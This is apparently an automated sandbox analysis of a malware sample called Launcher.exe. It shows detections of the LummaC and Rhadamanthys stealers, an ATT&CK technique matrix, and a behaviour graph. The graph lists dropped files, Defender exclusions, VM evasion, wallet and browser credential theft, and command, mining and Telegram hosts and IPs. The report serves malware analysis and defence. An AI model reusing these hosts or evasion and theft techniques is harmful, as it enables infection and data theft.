                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWP
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWP
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXW
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSB
                      Source: Yara matchFile source: Process Memory Space: xzuucncwbxucqic.exe PID: 5700, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: 29.2.xzuucncwbxucqic.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.xzuucncwbxucqic.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.2494852918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001E.00000003.1861315526.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000003.1865638072.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.1935737498.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.1865565180.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		211
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		11
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter                      		1
                      Scheduled Task/Job                      		411
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory11
                      File and Directory Discovery                      		Remote Desktop Protocol31
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		Logon Script (Windows)1
                      Scheduled Task/Job                      		41
                      Obfuscated Files or Information                      		Security Account Manager145
                      System Information Discovery                      		SMB/Windows Admin Shares1
                      Screen Capture                      		11
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                      Software Packing                      		NTDS681
                      Security Software Discovery                      		Distributed Component Object Model3
                      Clipboard Data                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets2
                      Process Discovery                      		SSHKeylogging124
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials271
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job271
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637040 Sample: Launcher.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 91 xmr-eu1.nanopool.org 2->91 93 menuedgarli.shop 2->93 95 t.me 2->95 111 Sigma detected: Xmrig 2->111 113 Suricata IDS alerts for network traffic 2->113 115 Found malware configuration 2->115 119 17 other signatures 2->119 10 Launcher.exe 4 2->10         started        15 MicrosoftEdgeUpdate.exe 2->15         started        17 svchost.exe 2->17         started        19 9 other processes 2->19 signatures3 117 DNS related to crypt mining pools 91->117 process4 dnsIp5 103 5.252.153.122, 3000, 49719 WORLDSTREAMNL Russian Federation 10->103 105 138.124.55.36, 49722, 49728, 49731 NOKIA-ASFI Norway 10->105 107 185.170.153.104, 3000, 49718 NODE4-ASGB United Kingdom 10->107 83 C:\Users\user\AppData\...\wxymrnibweqciwn.exe, PE32 10->83 dropped 85 C:\Users\user\AppData\...\qzemwxiuzucyxcx.exe, PE32 10->85 dropped 87 C:\Users\user\AppData\...\niyrycbicwuyiuc.exe, PE32+ 10->87 dropped 89 C:\Users\user\AppData\...\xzuucncwbxucqic.exe, PE32 10->89 dropped 161 Found many strings related to Crypto-Wallets (likely being stolen) 10->161 163 Adds a directory exclusion to Windows Defender 10->163 21 xzuucncwbxucqic.exe 10->21         started        24 wxymrnibweqciwn.exe 10->24         started        26 qzemwxiuzucyxcx.exe 10->26         started        37 7 other processes 10->37 165 Antivirus detection for dropped file 15->165 167 Multi AV Scanner detection for dropped file 15->167 169 Changes security center settings (notifications, updates, antivirus, firewall) 17->169 29 MpCmdRun.exe 17->29         started        109 51.15.58.224 OnlineSASFR France 19->109 171 Query firmware table information (likely to detect VMs) 19->171 31 conhost.exe 19->31         started        33 WerFault.exe 19->33         started        35 conhost.exe 19->35         started        file6 signatures7 process8 file9 121 Antivirus detection for dropped file 21->121 123 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->123 125 Contains functionality to inject code into remote processes 21->125 127 Injects a PE file into a foreign processes 21->127 39 xzuucncwbxucqic.exe 21->39         started        129 Query firmware table information (likely to detect VMs) 24->129 131 Switches to a custom stack to bypass stack traces 24->131 133 Tries to detect sandboxes / dynamic malware analysis system (registry check) 24->133 43 svchost.exe 24->43         started        79 C:\Users\user\...\MicrosoftEdgeUpdate.exe, PE32 26->79 dropped 135 Multi AV Scanner detection for dropped file 26->135 45 cmd.exe 26->45         started        47 powershell.exe 26->47         started        55 2 other processes 26->55 49 conhost.exe 29->49         started        81 C:\ProgramData\...\RuntimeBroker.exe, PE32+ 37->81 dropped 137 Sets debug register (to hijack the execution of another thread) 37->137 139 Adds a directory exclusion to Windows Defender 37->139 51 powershell.exe 23 37->51         started        53 powershell.exe 11 37->53         started        57 14 other processes 37->57 signatures10 process11 dnsIp12 97 menuedgarli.shop 104.21.32.1, 443, 49727, 49729 CLOUDFLARENETUS United States 39->97 99 t.me 149.154.167.99, 443, 49726 TELEGRAMRU United Kingdom 39->99 141 Query firmware table information (likely to detect VMs) 39->141 143 Found many strings related to Crypto-Wallets (likely being stolen) 39->143 145 Tries to harvest and steal browser information (history, passwords, etc) 39->145 147 Tries to steal Crypto Currency Wallets 39->147 101 185.236.26.111, 49739, 5968 SOLTIAES Spain 43->101 149 System process connects to network (likely due to code injection or exploit) 43->149 151 Switches to a custom stack to bypass stack traces 43->151 59 fontdrvhost.exe 43->59         started        153 Uses schtasks.exe or at.exe to add and modify task schedules 45->153 71 2 other processes 45->71 155 Queries memory information (via WMI often done to detect virtual machines) 47->155 61 conhost.exe 47->61         started        157 Loading BitLocker PowerShell Module 51->157 63 conhost.exe 55->63         started        73 2 other processes 55->73 159 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 57->159 65 net1.exe 1 57->65         started        67 conhost.exe 57->67         started        69 conhost.exe 57->69         started        75 3 other processes 57->75 signatures13 process14 process15 77 WerFault.exe 59->77         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.